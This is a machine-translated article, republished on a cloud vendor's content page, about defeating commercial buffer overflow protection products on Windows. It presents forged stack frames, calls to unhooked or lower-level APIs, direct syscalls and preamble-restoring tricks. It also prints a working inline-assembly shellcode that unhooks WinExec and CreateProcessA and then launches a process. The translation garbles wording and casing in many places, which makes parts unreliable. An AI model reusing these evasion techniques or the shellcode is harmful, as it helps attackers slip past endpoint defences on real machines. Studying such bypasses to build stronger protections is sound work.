Bypass Buffer Overflow Protection System

Source: Internet
Author: User
Tags csa

Bypass Buffer Overflow Protection System

-- [1-Introduction
Recently, some commercial security agencies have begun to propose some solutions to solve the buffer overflow problem. This article analyzes these protection schemes and introduces some technologies to bypass these buffer overflow protection systems.

Many commercial organizations have created many technologies to prevent Buffer Overflow. Recently, the most popular technology is stack tracing, which is the easiest way to implement anti-overflow technology, but it is also the most easily bypassed by attackers.

It is worth mentioning that many famous commercial products, such as Entercept and okena, use this technology.

-- [2-stack backtracking
Most of the existing commercial security systems do not actually prevent buffer overflow, but attempt to detect the execution of shellcode.

The most common technology for detecting shellcode is checkingCodePage permission. It checks whether the code is executed on a writable memory page to determine whether the shellcode is executed. this method is feasible because the Memory attribute of the code segment is usually not writable, And the x86 system does not support the non-executable Memory attribute bit.

Some overflow protection systems also execute some additional checks to determine whether the Memory Page of the Code belongs to the memory ing of a PE file section and does not belong to an anonymous memory section.

[-----------------------------------------------------------]

Page = get_page_from_addr (code_addr );
If (page-> permissions & writable)
Return buffer_overflow;

Ret = page_originates_from_file (PAGE );
If (Ret! = True)
Return buffer_overflow;

[-----------------------------------------------------------]
Pseudo code for code page permission checking
The buffer overflow protection technology (bopt) that relies on Stack backtracking does not really create an unexecutable stack segment, but monitors Shellcode Execution through hook operating system calls.

Most operating systems can be hooked in user or kernel state.

The following sections describe how to escape the kernel hook and the next section describes how to bypass the user-mode hook.

-- [3-escape kernel state hook
When you hook the kernel, the Host Intrusion Protection System (HIPS) must be able to monitor where user-state APIs are called.

Because functions in kernel32.dll and NTDLL. dll are called in a large number, an API call is usually called with a real system trap call (syscall trap call)
Many stack frames are separated. Therefore, some intrusion protection systems rely on Stack backtracking to locate the original callers of system calls.

-- [3.1-kernel stack backtracking
Although stack tracing can take place in both user and kernel modes, stack tracing is much more important for kernel components with buffer overflow protection compared with user-mode components. the existing commercial bopt kernel components rely entirely on Stack backtracking to detect Shellcode Execution. Therefore, escaping from kernel Hook can be simplified to making the stack backtracking mechanism invalid.
Stack backtracking involves traversing the stack frame and passing the return address to the upper layer for Buffer Overflow detection.Program.

Generally, there is an additional "return into libc" Check, including checking whether a return address points to the next command of call or JMP. Code of the most basic stack rollback operation (usually used in bopt), just like the following:
[-----------------------------------------------------------]

While (is_valid_frame_pointer (EBP )){
Ret_addr = get_ret_addr (EBP );

If (check_code_page (ret_addr) = buffer_overflow)
Return buffer_overflow;

If (does_not_follow_call_or_jmp_opcode (ret_addr ))
Return buffer_overflow;

EBP = get_next_frame (EBP );
}

[-----------------------------------------------------------]
Pseudo code for bopt stack backtracing
When discussing how to avoid stack tracing, the most important thing to understand is how Stack tracing works in the x86 system. When calling a function, A typical stack frame looks like the following:

::
| ------------------------- |
| Function B parameter #2 |
| ------------------------- |
| Function B parameter #1 |
| ------------------------- |
| Return EIP address |
| ------------------------- |
| Saved EBP |
| ===============================|
| Function a parameter #2 |
| ------------------------- |
| Function a parameter #1 |
| ------------------------- |
| Return EIP address |
| ------------------------- |
| Saved EBP |
| ------------------------- |
The EBP register points to the next stack frame. Without the EBP register, it is very difficult, or it is impossible to correctly identify and track all stack frames.

Modern compilers usually do not use EBP as the stack frame pointer, but as a general register. After EBP optimization, a stack frame looks as follows:

| ----------------------- |
| Function parameter #2 |
| ----------------------- |
| Function parameter #1 |
| ----------------------- |
| Return EIP address |
| ----------------------- |
Note that the EBP register does not appear in the stack. Without the EBP register, the buffer overflow detection technology cannot implement stack backtracking accurately. in this way, it is difficult for them to perform detection. A simple "return into libc" attack can bypass protection.

Simply calling an API that is lower-level than the bopt hook api can invalidate this detection technology.

-- [3.2-counterfeit stack frame

Because the stack is under full control of shellcode, You can thoroughly change its content before calling the API. specially modified stack frames can be used to bypass monitoring of buffer overflow.

As explained above, the buffer overflow detection tool looks for three key elements of the lattice code: Read-Only page attributes, memory ing file section, and pointing to call, the return address of the command after JMP. since function pointers change
Calling semantics, bopt do not (and cannot) check that a call or JMP
Actually points to the API being called. Most importantly, the bopt cannot
Check return addresses beyond the last valid EBP frame pointer
(It cannot stack backtrace any further ).

Therefore, you can avoid bopt by creating a final stack frame with a valid return address. The return address must point to a memory ing FILE Section residing on the read-only memory page, and followed by a call or JMP command. assuming that the spoofed return address is reasonably close to 2nd return addresses, shellcodeo can easily gain control again

To point to a forged return address, the ideal command order is
[-----------------------------------------------------------]

JMP [eax]; or call [eax], or another register
Dummy_return:...; some number of NOPs or easily
; Reversed instructions, e.g. inc eax
RET; any return will do, e.g. Ret 8

[-----------------------------------------------------------]
It is easy to bypass the kernel bopt components because they must rely on user-controlled data (stacks) to verify the validity of API calls. By correctly operating the stack, the analysis of site return addresses can be effectively ended.

This kind of stack tracing and evasion technology also affects the user's hooks.

-- [4. Escape user State hooks
If a series of correct commands appear in a valid memory area, it is possible to bypass kernel buffer overflow protection. similar technologies can be used to bypass user-state bopt components. More importantly, because the shellcode runs with the same permissions as the user-state hook, we can also adopt many other technologies to avoid bopt monitoring.

-- [4.1-actual problem-Incomplete API hooking
User-mode buffer overflow protection technology has many problems. For example, attackers may choose many different methods to achieve their goals, while the overflow protection system may only detect some of them.

It is very difficult or impossible to determine how an attacker will construct its shellcode in advance. It is not easy to choose a good method, and there are many obstacles in front of you, such
A. the Unicode and ANSI versions of API calls are not taken into account at the same time.
B. The chain call relationship of APIS is not taken into account. For example, many functions in kernel32.dll only slightly encapsulate functions in Ntdll. dll.
C. Frequent changes to Microsoft Windows APIs

-- [4.1-All versions without hook APIs
During User-state hooking, the most common mistake is that the Code path is not completely overwritten. to prevent malicious code, all the APIs that attackers can use must be hooked. this requires the overflow protection system to hook up the code that attackers must use. However, as we will reveal below, once an attacker has started to execute his code, it is difficult for the 3rd-party protection system to grasp all its operations. In fact, there is no commercial protection system that we have tested that can effectively overwrite the attacker's code path.

Many windows APIs have two different versions, ANSI and Unicode. ANSI functions usually end with A, while Unicode ends with W. ANSI functions are generally simple packaging of Unicode functions. For example, createfilea is an ANSI function. The parameter passed to it is converted to a unicode string, and then it calls createfilew. unless we hook the API's ANSI and unicode2 versions, attackers can bypass our protection mechanism by calling another version of the API.

For example, entercept4.1 hook loadlibrarya, But it forgets hook loadlibraryw. if a protection system only hooks one version of the API, it should hook the Unicode version of the API. In this respect, okenal/CSA does a good job, and it hooks loadlibrarya, loadlibraryw, loadlibraryexa, loadlibraryexw. unfortunately, for the 3rd-party overflow protection system, it is not enough to hook several kernel32.dll functions.

-- [4.1.2-not hook deep enough
In WindowsNT, kernel32.dll is only NTDLL. dll must be simply packaged, but most overflow protection systems do not hook NTDLL. the function in the DLL. This error is similar to the two versions without the hook api. Attackers can directly call NTDLL. DLL function to bypass the check set in kernel32.dll.

For example, nai Entercept tries to detect getprocaddress () in kernel32.dll called by shellcode. However, shellcode can be rewritten to call NTDLL. DLL ldrgetprocedureaddress (), which achieves the same purpose and bypasses the detection.

Generally, shellcode can completely avoid user-state hooks and achieve the goal by calling the system call (see section 4.5)

-- [4.1.3-not fully hook-
The interaction between different Win32 APIS is very complex and difficult to understand. Accidentally, an entry window is left for intruders.

For example, both okena/CSA and nai Entercept hook winexec to prevent attackers from executing a process. The winexec call sequence is as follows:
Winexec () --> createprocessa () --> createprocessinternala ()

Okena/CSA and nai Entercept hook winexec () and createprocessa (). (See Appendix A. However, none of these two systems hook createprocessinternala () (exported by kernel32.dll ), when writing shellcode, attackers can use createprocessinternala () to replace winexec ().

Before calling createprocessinternala (), createprocessa () is pushed into the stack by two null values. Therefore, shellcode only needs to press two null values into the stack, and then calls createprocessinterala () directly (), the user State hook monitoring of these two products can be avoided.

When the new DLLs and APIs are released, the interaction between Win32 APIS is more complicated, which makes the problem more complicated. Third-party protection systems will be very unfavorable when implementing their overflow protection technology. A small mistake may be exploited by attackers.

-- [4.2-bed jumping fun
The first five bytes of most Win32 API functions are the same. First, EBP is pushed to the stack, and then EBP is directed to the position of ESP.
[-----------------------------------------------------------]

Code bytes assembly
55 push EBP
8bec mov EBP, ESP

[-----------------------------------------------------------]
Okena/CSA and Entercept both use the inline function hooking. They overwrite the first five bytes of the function as the jump command (JMP) or call. Below are the first few bytes after winexec is hooked.
[-----------------------------------------------------------]

Code bytes assembly
E8 xx call XXXXXXXX
54 push ESP
53 push EBX
56 push ESI
57 push EDI

[-----------------------------------------------------------]
Or, the first few bytes are changed to JMP.

[-----------------------------------------------------------]

Code bytes assembly
E9 xx JMP XXXXXXXX
...

[-----------------------------------------------------------]
Obviously, shellcode can easily verify whether the function is hooked before calling the function. If a protected system exists, shellcode can use other technologies to bypass the hook.

-- [4.2.1-patch table jump
When an API is hooked, the first few bytes of the original function are stored in a table, so that the overflow protection system can restore the function after monitoring is complete, these bytes are placed in a patch table. The patch table resides in a certain area of a process space. When shellcode detects a hook, it can search for the patch table, call the original function, which can completely avoid the hook, even if the overflow protection system monitors all possible code paths.

-- [4.2.2-Skip Hook]
In addition to locating the patch table, shellcode can contain an original function header and use this header code to start executing API functions. Because intel X86 has a variable-length command, we need to do this

[-----------------------------------------------------------]

Shellcode:
Call winexecpreamble

Winexecpreamble:
Push EBP
MoV EBP, ESP
Sub ESP, 54
JMP winexec + 6

[-----------------------------------------------------------]
If other functions in the call path are hooked, this technology may not work. Entercept also hooks createprocessa (), which is a function called by winexec (). Therefore, to avoid detection, the shellcode should also contain a copy of the createprocessa () entry code.

-- [4.3-patching Win32 APIs again
If a fundamental error is made when user State overflow is used to protect system components, it is useless even if Win32 APIS is thoroughly hooked.

A specific system will make a series of errors when implementing their API hook. In order to be able to rewrite the hook function entry code, the DLLs code segment is set to writable, entercept sets kernel32.dll and NTDLL. the DLL code segment is writable so that it can modify the content of the Code segment. However, Entercept never resets the writable mark!
Due to this serious security defect, attackers can use the original function entry point to re-write the function that has been hooked. For the winexec () and createprocessa () examples, we only need to re-write winexec () the first six bytes of createprocessa () (to align the command)
[-----------------------------------------------------------]
Winexecoverwrite:
Code bytes assembly
55 push EBP
8bec mov EBP, ESP
83ec54 sub ESP, 54

Createprocessaoverwrite:
Code bytes assembly
55 push EBP
8bec mov EBP, ESP
Ff752c push dword ptr [EBP + 2C]
[-----------------------------------------------------------]
The example of shellcode below can effectively deal with NaI Entercept. The method used is to rewrite the function header.
[-----------------------------------------------------------]

// This sample code overwrites the preamble of winexec and
// Createprocessa to avoid detection. The Code then
// Callwinexec with a "calc.exe" parameter.
// The Code demonstrates that by overwriting Function
// Preambles, it is able to evade Entercept and okena/CSA
// Buffer overflow protection.

_ ASM {
Pusha

JMP jumpstart
Start:
Pop EBP
XOR eax, eax
MoV Al, 0x30
MoV eax, FS: [eax];
MoV eax, [eax + 0xc];

// We now have the module_item for NTDLL. dll
MoV eax, [eax + 0x1c]

// We now have the module_item for kernel32.dll
MoV eax, [eax]

// Image base of kernel32.dll
MoV eax, [eax + 0x8]

Movzx EBX, word PTR [eax + 3ch]

// PE. oheader. directorydata [Export = 0]
MoV ESI, [eax + EBX + 78 H]
Lea ESI, [eax + ESI + 18 h]

// EBX now has the base module address
MoV EBX, eax
Lodsd

// ECx now has the number of function names
MoV ECx, eax
Lodsd
Add eax, EBX

// EdX has addresses of functions
MoV edX, eax

Lodsd

// Eax has address of names
Add eax, EBX

// Save off the number of named Functions
// For later
Push ECx

// Save off the address of the Functions
Push edX

Resetexportnametable:
XOR edX, EDX

Initstringtable:
MoV ESI, EBP // beginning of string table
INC ESI

Movethroughtable:
MoV EDI, [eax + EDX * 4]
Add EDI, EBX // EBX has the process base address

XOR ECx, ECx
MoV Cl, byte PTR [EBP]
Test Cl, Cl
JZ donestringsearch

Stringsearch: // ESI points to the function string table
Repe cmpsb
Je found

// The number of named functions is on the stack
CMP [esp + 4], EDX
Je notfound
INC edX
JMP initstringtable
Found:
Pop ECx
SHL edX, 2
Add edX, ECx
MoV EDI, [edX]
Add EDI, EBX
Push EDI
Push ECx
XOR ECx, ECx
MoV Cl, byte PTR [EBP]
INC ECx
Add EBP, ECx
JMP resetexportnametable

Donestringsearch:
Overwritecreateprocessa:
Pop EDI
Pop EDI
Push 0x06
Pop ECx
INC ESI
Rep movsb

Overwritewinexec:
Pop EDI
Push EDI
Push 0x06
Pop ECx
INC ESI
Rep movsb

Callwinexec:
Push 0x03
Push ESI
Call [esp + 8]

Notfound:
Pop edX
Stringexit:
Pop ECx
Popa;
JMP exit

Jumpstart:
Add ESP, 0x1000
Call start
Winexec:
_ Emit 0x07
_ Emit 'W'
_ Emit 'I'
_ Emit 'n'
_ Emit 'E'
_ Emit 'X'
_ Emit 'E'
_ Emit 'C'
Createprocessa:
_ Emit 0x0e
_ Emit 'C'
_ Emit 'R'
_ Emit 'E'
_ Emit 'A'
_ Emit 'T'
_ Emit 'E'
_ Emit 'P'
_ Emit 'R'
_ Emit 'O'
_ Emit 'C'
_ Emit 'E'
_ Emit's'
_ Emit's'
_ Emit 'A'
Endoftable:
_ Emit 0x00

Winexecoverwrite:
_ Emit 0x06
_ Emit 0x55
_ Emit 0x8b
_ Emit 0xec
_ Emit 0x83
_ Emit 0xec
_ Emit 0x54
Createprocessaoverwrite:
_ Emit 0x06
_ Emit 0x55
_ Emit 0x8b
_ Emit 0xec
_ Emit 0xff
_ Emit 0x75
_ Emit 0x2c
Command:
_ Emit 'C'
_ Emit 'A'
_ Emit 'l'
_ Emit 'C'
_ Emit '.'
_ Emit 'E'
_ Emit 'X'
_ Emit 'E'
_ Emit 0x00

Exit:
_ Emit 0x90

// Normally call exitthread or something here
_ Emit 0x90
}

[-----------------------------------------------------------]

-- [4.4-attack user-mode components
Although it is very effective to escape the hook and technology of the user State overflow protection system, there are other good methods to bypass detection. because the shellcode and overflow protection systems run in the same permission and address space, this allows shellcode to directly attack and overflow the system itself.

Basically, the attack buffer overflow protection system is used to overturn the Shellcode Detection execution mechanism.

The shellcode validity check has only two basic technical principles:
1. The data to be detected is dynamically determined during the hook api call process.
Or
2. Data is collected at process startup and then checked during each API call
In each case, attackers may destroy the process.

-- [4.4.1-patching IAT
Compared to executing their memory page attribute functions, commercial overflow protection systems usually use the API functions provided by the operating system. in WINNT, they are encapsulated in Ntdll. DLL, these APIs are imported to the user-state component through the PE import table. Attackers can modify the export table of the DLL where the function to be used by shellcode is located to change the location of the API, by providing our own APIs for the overflow protection system, we can easily bypass detection.

-- [4.4.2-data patching Section
For various reasons, an overflow detection system may use a pre-built page attribute list, so that we change the virtualquery () address (that is, replacing this function) it is useless. to damage the overflow detection system, shellcode must locate and modify this list.

-- [4.5-directly call syscall
As mentioned above, instead of using NTDLL. DLL calls syscall, but attackers can directly call syscall in shellcode. Although this method can effectively deal with user-state detection components, it cannot bypass kernel-state detection components.

To use this technology, you must understand how kernel functions use parameters, which may be related to kernel32.dll and NTDLL. DLL functions use different parameters. similarly, you must know the call number of the system call. You can obtain the call number dynamically. by using a method similar to the function address, once you have NTDLL. the function address in the DLL, skip one byte, and then read the following DWORD. This is the system call number in the system call table, which is often used in rootkit.

This section of pseudocode demonstrates how to directly call ntreadfile

...
XOR eax, eax

// Optional key
Push eax
// Optional pointer to large integer with the file offset
Push eax

Push length_of_buffer
Push address_of_buffer

// Before call make room for two Dwords called the iostatusblock
Push address_of_iostatusblock

// Optional apccontext
Push eax
// Optional apcroutine
Push eax
// Optional event
Push eax

// Required file handle
Push hfile

// Eax must contain the system call number
MoV eax, found_sys_call_num

// EdX needs the address of the userland Stack
Lea edX, [esp]

// Trap into the kernel
// (Recent Windows NT versions use "sysenter" instead)
Int 2e

-- [4.6-counterfeit stack frame
As discussed in section 3.2, Kernel stack tracing can be avoided by forging stack frames. shellcode can forge a stack frame without an EBP register, because stack tracing relies on EBP storage to locate the next stack frame, counterfeit stack frames can prevent stack tracing by forging stack frames.

Of course, when the EIP still points to a shellcode residing in a writable memory segment, generating fake stack frames is useless. to bypass the protection code, shellcode needs to use an address located in the unwritable memory area, which creates a problem because shellcode eventually needs to regain control of execution.

To regain control, we use the "RET" command, which can be obtained by dynamically searching 0xc3 in the memory.

The following is an example of a normal loadlibrary ("kernel32.dll") Call.

Push kernel32_string
Call loadlibrary

Return_eip:

.
.
.

Loadlibrary:; * See below for a stack Authentication

.
.
.
RET; return to stack-based return_eip

| ------------------------------ |
| Address of "kernel32.dll" str |
| ------------------------------ |
| Return address (return_eip) |
| ------------------------------ |
As previously explained, overflow protection system code is executed before loadlibrary. Because the return address falls into a writable memory, the system records overflow and terminates the target process.

The following code demonstrates the use of the 'ret 'command Technology

Push return_eip
Push kernel32_string

; Fake "Call loadlibrary" call
Push address_of_ret_instruction
JMP loadlibrary

Return_eip:

.
.
.

Loadlibrary:; * See below for a stack Authentication

.
.
.
RET; return to non stack-based address_of_ret_instruction

Address_of_ret_instruction:

.
.
.
RET; return to stack-based return_eip
Once again, the overflow protection system code is executed before loadlibrary, but this time, the returned address saved in the stack is in non-writable memory, there is no EBP register in the stack, so the Protection Code cannot find the next stack frame through stack backtracking, and then checks whether the return address of the next stack frame points to a writable memory. This allows shellcode to call loadlibrary when returning to ret. the RET command pops up the next return address to exit the stack, and then points the EIP to it.

| ------------------------------ |
| Return address (return_eip) |
| ------------------------------ |
| Address of "kernel32.dll" str |
| ------------------------------ |
| Address of "RET" Instruction |
| ------------------------------ |
More importantly, but setting more complex counterfeit stack frames can disrupt protection code.

The following is an example of using 'ret 8' to replace 'ret 'for counterfeit stack frames.
| -------------------------------- |
| Return address |
| -------------------------------- |
| Address of "RET" Instruction | <-fake frame 2
| -------------------------------- |
| Any value |
| -------------------------------- |
| Address of "kernel32.dll" str |
| -------------------------------- |
| Address of "RET 8" Instruction | <-fake frame 1
| -------------------------------- |
This can cause a special 32-bit value to exit the stack, making any analysis more confusing.

-- [5-Summary
Currently, the major commercial overflow protection system does not prevent stack overflow, but attempts to detect Shellcode Execution. The most common technology is to rely on the stack rollback code page permission check.

Stack backtracking goes back to all stack frames, and then checks whether their return addresses are in a writable memory area. If not, it is regarded as shellcode.

This article demonstrates some techniques used to bypass user-mode and kernel-mode overflow protection systems, covering processing function entry code and creating forged stack frames.

All in all, the current mainstream overflow protection systems are flawed, which gives us an insecure sense of security. These systems are vulnerable to a severe attacker.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.